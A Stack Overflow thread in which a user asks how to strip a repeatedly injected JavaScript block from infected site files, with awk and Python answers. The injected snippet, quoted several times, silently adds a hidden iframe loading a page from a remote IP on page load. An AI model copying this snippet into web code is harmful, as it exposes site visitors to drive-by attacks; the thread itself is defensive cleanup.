# Remove a block of code

Tags: linux, unix, awk, sed

My JS files have got this malicious code which I want to get rid of. So files have multiple occurances of it. Cananyone help use SED or AWK to remove it ?

```
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}
```

Comment: Kindly post expected output with your efforts which you have put to solve the problem too in your post.

Comment: So all my JS  files have this block added to them, on some instances the block exists like 10 times in the same file. I want to be able to remove the whole  block from all the files

Comment: Please avoid *"Give me the codez"* questions. Instead show the script you are working on and state where the problem is. Also see [How much research effort is expected of Stack Overflow users?](https://meta.stackoverflow.com/q/261592/608639)

Comment: Looks like we got @jww-ed so I'm upvoting everyone else's answers to compensate as usual.

Answer (score 1, accepted):

I would suggest using a Python script:

```
list_of_js_file_paths = ["/path/to/file/1","/path/to/file/2"]

for i in list_of_js_file_paths:
    original = ""
    with open(i,"r") as file:
        original = file.read()
    original = original.replace("""
    <malicious_code>
    ""","")
    with open(i,"w") as file:
        file.write(original)
```

Now run it via `sudo python3 yourpythonfile.py`

Comment: cant bring all the files in one place it will break the whatever is left of the system.

Comment: Alright, instead you could manually make a list of the file paths and iterate through those

Answer (score 2):

Save just that code segment in a file named "bad" and then run this on your infected files (uses GNU awk for multi-char RS):

```
awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected
```

Once you're happy it's behaving as expected after testing on 1 infected file, you can add the inplace editing flag (again gawk-only) and run it on all of your infected files at once:

```
awk -i inplace -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); print; next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected1 infected2 ... infectedN
```

---

wrt your command below that "it didn't work", look at it working:

```
$ cat bad
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}

$ cat infected
foo
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}
bar

$ awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected
foo
bar
```

Comment: I suppose your way is quicker

Comment: I've no idea. I suspect the OP will be happy with anything that just works :-).

Comment: Yes, but yours is a one(ish)-liner. Hence my upvote :)

Comment: I could make it a one-liner with some golfing `awk -vRS='^$' 'NR==FNR{b=$0;next} s=index($0,b){$0=substr($0,1,s-1)substr($0,s+length(b))}1' bad infected` but IMHO the loss of useful clarity isn't worth the gain in useless brevity :-).

Comment: @tango_chintu I assume you must have no idea how extremely frustrating it is to try to help someone and just get "it didn't work" back in return. No thanks, no indication of in what way it didn't work so no way to try to help you identify and fix the problem, nothing. OK, good luck then.

Comment: I am so sorry. You are right I should I have thanked you first.I apologise. 
So when I did that 
It printed the whole section on the screen with the code found but when I opent he malicious file its still there.

Comment: I added an example showing it working. If it's not working for you then you are doing something other than what is in my answer or your input files are not the same as you have shown us and described so far.

Comment: Let me try this real quick. Thanks for your quick reply.

Comment: How about this https://pastebin.com/1TepAXcb copied the file on PasteBin. Can you please try on this file.

Comment: Sorry, I'm not going to go clicking around the internet to try to help you and I doubt if many other people would either. If what you're provided in your question so far isn't adequate then edit your question to contain a [mcve] with concise, testable sample input and expected output. See [ask] if that's not clear.

Comment: @EdMorton Thanks for your help anyway. The file is too big to be put here and would eat up the whole question.  Dont want to make a meal of it so will leave it here for some expert who could find a solution.

Comment: That's why you are supposed to create a [mcve], not just post some huge file and expect the rest of us to work through it. You can't possibly need to provide more than about 20 lines of sample input and expected output to show us the problem. You already found some experts who know the solution, but you apparently haven't told us what the real problem is yet.

Comment: I dont think I can be any clearer than this @EdMorton. All my JS files have this code injected in them. Need a sed or any other command to remove it. If you can't figure it out lets not debate here and let someones have a go at it. Thanks for trying to help me.

Comment: @agentscript - the reason that you see the change output but the file itself hasn't changed is because _that's how awk works_ — awk reads your file and writes its output to standard-output; it doesn't change the input file ... that's why Ed said _"Once you're happy it's behaving as expected after testing on 1 infected file, you can add the inplace editing flag"_ -- so then awk _would_ write the output back to the original file.

Comment: hey @StephenP thanks for your comment but its not even showing me the changed file just shows the whole file on screen. Could it be because the code is repeated like 60 times its taking one out at a time ?